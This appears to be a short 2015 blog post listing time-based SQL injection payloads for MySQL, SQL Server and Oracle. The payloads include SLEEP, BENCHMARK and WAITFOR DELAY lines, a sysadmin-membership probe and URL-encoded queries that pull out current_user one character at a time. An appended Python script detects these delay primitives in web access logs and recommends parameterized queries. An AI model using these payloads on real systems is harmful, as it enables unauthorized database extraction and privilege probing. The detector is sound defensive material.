Restart !!!

Time based sql injection

앵오 2015. 1. 28. 10:40

 - if+(select+ascii(substring(current_user,1,1)))>60+waitfor+delay+'0:0:1'

 - declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) >0 waitfor delay '0:0:5'


MySQL Time-Based

Resulting query (with malicious SLEEP injected).

 - SELECT * FROM products WHERE id=1-SLEEP(15)


Resulting query (with malicious BENCHMARK injected).

 - SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())


Resulting query - Time-based attack to verify database version.

 - SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(15), 0)


SQL Server Time-Based

Resulting query (with malicious WAITFOR DELAY injected).

 - SELECT * FROM products WHERE id=1; WAITFOR DELAY '00:00:15'


Resulting query (verify if user is sa).

 - SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAITFOR DELAY '00:00:15'


Oracle Time-Based

Executing SLEEP() in Oracle (execution suspended 15 seconds).

 - BEGIN DBMS_LOCK.SLEEP(15); END;



Checking for 'sysadmin' membership using an IF clause

 - If the DB account has SA privileges, system commands can be executed, so first determine whether it is SA

 - URL?query=1;if+(select+IS_SRVROLEMEMBER('sysadmin'))=1+waitfor+delay+'0:0:1'


Obtaining data using an IF clause

 - URL?query=1;if+(select+len(current_user))=3+waitfor+delay+'0:0:1'

 - URL?query=1;if+(select+ascii(substring(current_user,1,1)))>60+waitfor+delay+'0:0:1'
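
Added example, not part of the original post: a detection check that scans web access-log lines for the delay primitives listed above (WAITFOR DELAY, SLEEP, BENCHMARK, DBMS_LOCK.SLEEP), decoding the `+` and %XX encoding seen in the URL payloads first. The log format, the `/item` path, the client addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Delay primitives that appear in the payloads on this page, per DBMS.
DELAY_PATTERNS = {
    "mssql-waitfor": re.compile(r"\bwait\s*for\s+delay\b"),
    "mysql-sleep": re.compile(r"(?<![.\w])sleep\s*\("),
    "mysql-benchmark": re.compile(r"\bbenchmark\s*\("),
    "oracle-dbms_lock": re.compile(r"\bdbms_lock\s*\.\s*sleep\b"),
}

def normalize(query):
    """Decode '+' and %XX (twice, for double encoding), drop /* */ comments, lowercase."""
    for _ in range(2):
        query = unquote_plus(query)
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    return re.sub(r"\s+", " ", query).lower()

def delay_primitives(request_target):
    """Return the names of delay primitives found in a request target's query string."""
    text = normalize(urlsplit(request_target).query)
    return [name for name, rx in DELAY_PATTERNS.items() if rx.search(text)]

def scan(log_lines):
    """Yield (client, target, hits) for log lines whose query holds a delay primitive."""
    for line in log_lines:
        m = re.match(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"', line)
        if m and (hits := delay_primitives(m.group(2))):
            yield m.group(1), m.group(2), hits

# Constructed sample log lines (documentation address ranges, hypothetical path).
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Jan/2015:10:40:01 +0900] "GET /item?query=1;if+(select+len(current_user))=3+waitfor+delay+\'0:0:1\' HTTP/1.1" 200 512',
    '203.0.113.7 - - [28/Jan/2015:10:40:09 +0900] "GET /item?id=1-SLEEP(15) HTTP/1.1" 200 512',
    '203.0.113.7 - - [28/Jan/2015:10:40:30 +0900] "GET /item?id=1-IF(MID(VERSION(),1,1)%3D%275%27,%2520SLEEP(15),0) HTTP/1.1" 200 512',
    '198.51.100.4 - - [28/Jan/2015:10:41:00 +0900] "GET /item?q=sleep+mask+delay HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for client, target, hits in scan(SAMPLE_LOG):
        print(client, hits, target)
```

A hit here is a signal to correlate with response latency for the same request; the underlying fix remains parameterized queries on the affected endpoint.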


